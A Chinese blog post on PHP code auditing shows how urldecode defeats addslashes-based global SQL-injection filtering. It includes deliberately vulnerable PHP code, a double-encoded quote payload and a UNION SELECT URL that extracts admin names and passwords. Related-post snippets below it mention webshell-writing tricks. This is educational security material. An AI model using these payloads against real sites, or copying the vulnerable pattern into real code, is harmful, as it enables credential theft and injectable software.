代码审计的艺术系列—第二篇

最新推荐文章于 2024-09-14 17:41:03 发布
最新推荐文章于 2024-09-14 17:41:03 发布
阅读量789 收藏 2
点赞数
分类专栏: 开发知识 文章标签: 信息安全 php 代码审计

0x01 前言

现在的WEB程序基本都有对SQL注入的全局过滤,运维人员配置PHP环境是一般会开启魔术引号GPC,即magic_quotes_gpc=On的情况下,如果输入的数据有单引号(’)、双引号(”)、反斜线(\)与 NUL(NULL 字符)等字符都会被加上反斜线进行转义处理。不过GPC在PHP5.4版本后就取消了,所以现在一般都用addslashes()函数来代替GPC进行过滤处理。目前用PHP开发的应用一般是MVC的框架模式进行开发,对GET、POST和COOKIE等传递的参数通常使用addslashes()函数进行转义,并引入一个类似common.php的文件进行处理addslashes()函数对接收的参数进行过滤,尤其是单引号。处理代码如下:

if (!empty($_GET))
{
$_GET  = addslashes_deep($_GET);
}
if (!empty($_POST))
{
$_POST = addslashes_deep($_POST);
}
if (!empty($_COOKIE))
{
$_COOKIE   = addslashes_deep($_COOKIE);
}
...
function addslashes_deep($value)
{
    if (empty($value))
    {
        return $value;
    }
    else
    {
		if (!get_magic_quotes_gpc())
		{
		$value=is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value);
		}
		else
		{
		$value=is_array($value) ? array_map('addslashes_deep', $value) : mystrip_tags($value);
		}
		return $value;
    }
}

addslashes_deep函数会判断GPC是否开启,如果没有开启就会对GET、POST和COOKIE传递的参数进行转义。然而仅仅使用这种方式会存在很多绕过的情况。接下来两篇会介绍这种防护下的存在被绕过的一些场景和案例~,这里有几篇确定好。

0x02 准备

知识储备:php基础、MySql入门
工具:notepad++
服务器环境:wamp
测试代码和sql:微信回复『代码2』 需要更新。

0x03 全局防护Bypass上篇的脑图

代码审计艺术2-思维导图

0x04 编码解码函数导致的Bypass

一些编码解码的函数像urldecode、base64decode的使用会导致绕过addslashes函数的全局防护,以urldecode函数为例,缺陷代码如下:

<?php
require_once('common.php');
$conn = mysql_connect('localhost', 'root', 'braid') or die('bad!');
mysql_query("SET NAMES binary'");
mysql_select_db('test', $conn) OR emMsg("数据库连接失败");
//这里使用了urldecode进行解码
$id = isset($_GET['id']) ? urldecode($_GET['id']) : 1;
//这里的sql语句有单引号保护,即特殊字符像单引号就会通过addslashes的处理
$sql = "SELECT * FROM news WHERE id='{$id}'";
$result = mysql_query($sql, $conn) or die(mysql_error()); 
?>

浏览器输入”http://localhost/sqltest/urldecode.php?id=1'",发现输出了一条新闻的标题和内容如下图:

代码审计2-1

说明单引号经过了addslashes函数的转义,我们查下sql查询的日志,确实是对单引号进行转义处理了:

SELECT * FROM news WHERE id='1\''

输入”http://localhost/sqltest/urldecode.php?id=1%2527",发现如下图的报错:
代码审计2-2
这种报错在安全测试人员眼里就是注入的标志。进一步观察数据库,发现除了news表外还有个admin表,我们可以构造获取管理员账户密码的语句”http://localhost/sqltest/urldecode.php?id=1%2527 union select 1,2,concat(name,0x23,pass) from admin%23”
代码审计2-3
对应执行的sql语句:

SELECT  SQL_CALC_FOUND_ROWS  *  FROM news WHERE id =  '-1' union  select 1 , 2, concat( name, 0x23, pass )  from admin

 

原创文章,转载请注明: 转载自安兔|anntoo.com 互联网安全新媒体平台

本文链接地址: 代码审计的艺术系列—第二篇

煜铭2011
关注
专栏目录
边缘计算与端侧推理原理与代码实战案例讲解【系列文章】
程序员光剑
07-04 1660
在当今数字化时代,随着物联网(IoT)设备的普及和人工智能技术的快速发展,传统的云计算模式面临着诸多挑战。数据传输延迟、网络带宽压力、隐私安全concerns等问题日益突出。为了解决这些问题,边缘计算和端侧推理技术应运而生,成为了现代计算架构中不可或缺的组成部分。边缘计算将计算能力下沉到靠近数据源的网络边缘,而端侧推理则直接在终端设备上进行AI模型的推理。这两种技术的结合不仅能够大幅降低数据传输延迟,提高实时性能,还能有效保护用户隐私,优化网络资源使用。
Java必知必会系列:安全编码与漏洞防护
程序员光剑
09-24 1718
作为一名具有十多年经验的软件工程师、安全专家、项目经理等职务的资深码农,我十分热心参加本次系列的举办。本文为《Java必知必会系列:安全编码与漏洞防护》第1篇。由于人工智能和机器学习正在改变软件开发的世界,越来越多的人开始关注这个新兴的领域。而AI在软件编程领域发挥着巨大的作用,从而促进了软件产业的发展。当人们开始将自己的工作从单纯的编码,升级到把AI技术应用于软件开发中时,安全问题也逐渐成为一个重点关注的问题。通过编写安全的代码,可以最大限度地降低系统中的隐患。
代码审计艺术系列—第一篇
煜铭2011
07-24 1124
0x01 前言 301:安全技术系列的文章还是啦,先会从一些初级的内容开始。:)近几年随着web安全人才的升级,越来越多的安全研究人员投入到php应用的漏洞挖掘,相应的代码安全问题也被大量的披露出来。身处这个时代,我有幸见识到身边白帽子不断寻求突破并丰富和完善了代码审计这个概念,时至今日笔者总结了一套基础的审计方法,厚着脸皮取名为代码审计艺术,希望能够帮助新人更好的认识和进入这一领域。 0x
代码审计艺术系列—第五篇
煜铭2011
07-24 1038
0x01前言 作者:HackBraid,乌云核心白帽子。白帽子分享之代码审计艺术系列(二、三、四季)是对绕过全局防护的场景进行的总结。没看前几季的同学,可以关注下。代码审计艺术系列—第一篇代码审计艺术系列第二篇代码审计艺术系列—第三篇代码审计艺术系列—第四篇接下来两篇介绍全局防护存在的盲点,首先是上篇: 盲点如下: ①注入点类似id=1这种整型的参数就会完全无视GPC的过滤;
代码审计艺术系列—第八篇
煜铭2011
07-24 835
0x00前言: 作者:HackBraid,乌云核心白帽子。接上篇代码审计艺术系列-第七篇,提到了一个上传漏洞搜索和挖掘的简单案例。 文件上传漏洞是一种非常常见的漏洞类型,也是直接获取服务器权限最直接的方式,所以快速发掘一套源码文件上传漏洞进行getshell是这篇要讨论的,主要分为危险函数、上传技巧和条件竞争漏洞三方面展开。  0x01危险函数: move_uploaded_file()g
代码审计艺术系列—第九篇
煜铭2011
07-24 1005
0x00前言: 作者:HackBraid,乌云核心白帽子。 文件包含漏洞也是一种非常常见的漏洞类型,产生的原因是传入的文件名没有经过合理的校验,从而让黑客包含了精心构造的文件最终造成的代码注入。所以一套源码快速发掘并利用文件包含getshell是这篇要讨论的,主要分为危险函数、本地文件包含、远程文件包含和截断技巧四方面展开。 0x01危险函数: include()include_once()
mysql宽字节数_Mysql宽字节注入 · BlBana’s BlackHouse
weixin_39564831的博客
02-08 137
字符集简介GBK是一种多字符的编码,通常来说,一个gbk编码汉字,占用2个字节。一个utf-8编码的汉字,占用3个字节。当将页面编码保存为gbk时输出2,utf-8时输出3。除了gbk以外,所有ANSI编码都是2个字节。现在我们来研究一下SQL注入中,字符编码带来的问题。开始测试0x01 Mysql中宽字节注入实例代码如下:1234567891011121314151617181920212223...
Spring Cloud微服务架构入门篇
程序员光剑
10-12 351
Spring Cloud 是构建分布式系统的一些常用框架组合,它将 Spring Boot、Spring Cloud Config、Spring Cloud Netflix、Spring Cloud AWS等组件进行整合,提供开发分布式系统的工具包,帮助 Spring Boot 应用快速地连接配置服务器、服务发现服务器、消息代理等组件,实现服务治理。Spring Cloud 为开发人员提供了一种简单的方式来实现分布式系统架构模式中的一些常见功能,如服务发现、服务熔断、弹性伸缩等。
架构师必知必会系列:数据治理与合规性
程序员光剑
09-24 2491
数据治理和合规性(Data Governance and Compliance)是企业应对数据泄露、管理、分类、存储、传输、共享、使用、保护等过程中的各个环节。作为一个技术领域,如何落地一套有效的数据治理和合规体系是一个技术人的重要工作。《数据治理与合规性》试图通过系统化的学习路线,帮助架构师和工程师更全面地理解并掌握数据治理和合规相关的核心知识和技能。本文为该系列的第一篇,将从数据管理、分类、隐私、保护、数据流动、违规处理、工具、数据湖、云端服务等多个方面进行讲解。
Hadoop原理与代码实例讲解
程序员光剑
07-02 348
Hadoop原理与代码实例讲解 作者:禅与计算机程序设计艺术 / Zen and the Art of Computer Programming / TextGenWebUILLM Hadoop原理与代码实例讲解 关键词:Hadoop原理,Hadoop生态
php代码审计【9】SQL 注入研究
司徒荆的博客
06-27 1169
https://www.cnblogs.com/shellr00t/p/5701184.html参考
sql注入之宽字节注入
shy的博客
11-19 232
利用场景: 1,网站对客户端输入的引号等字符进行了转义 2,网站数据库采用了gbk编码 代码分析: <?php //header("Content-Type: text/html; charset=gb2312"); $id=isset($_GET['id'])?addslashes($_GET['id']):11;//使用addslashes()对参数$id进行了过滤 $con=mysqli_connect('localhost','root','root'); mysqli_select
宽字符sql注入
ytuo1223的专栏
10-09 2574
以gbk字符编码为示范,拉开帷幕。gbk是一种多字符编码,具体定义自行百度。但有一个地方尤其要注意: 通常来说,一个gbk编码汉字,占用2个字节。一个utf-8编码的汉字,占用3个字节。在php中,我们可以通过输出 echo strlen("和"); 来测试。当将页面编码保存为gbk时输出2,utf-8时输出3。 除了gbk以外,所有ANSI编码都是2个字节。ansi只是一个标准,在不用的
宽字节注入详解
xyx107的博客
08-11 5191
尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。也有一些cms为了考虑老用户,所以出了gbk和utf-8两个版本。 我们就以gbk字符编码为示范,拉开帷幕。gbk是一种多字符编码,具体定义自行百度。但有一个地方尤其要...
SEAFARING靶场渗透
kknifek的博客
09-13 640
??echo '<??
dedecms(四种webshell姿势)
最新发布
2301_81881972的博客
09-14 1120
点击【系统】【sql命令行工具】--》多行命令中输入select '<?>' into outfile '+路径+创建文件名。与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下。点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】账号密码同为admin。
Netty笔记03-组件Channel
weixin_46425661的博客
09-12 936
本文主要讲解Netty中的组件Channel、ChannelFuture和CloseFuture
【网络安全】-rce漏洞-pikachu
weixin_65311462的博客
09-12 1225
由于应用程序在处理用户输入时未能正确验证、过滤或限制输入数据,导致hacker能通过网络在目标系统上执行任意代码或命令,从而完全控制受影响的系统。RCE漏洞是一种严重的安全漏洞类型,对系统安全构成重大威胁。
java代码审计 入门篇
08-24
对于Java代码审计,入门篇的几个重点包括: 1. 熟悉Java语言和开发框架:了解Java的基础知识和常见的开发框架,如Spring、Struts等。掌握Java的语法、面向对象编程、异常处理等内容。 2. 学习安全编码规范:掌握常见...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值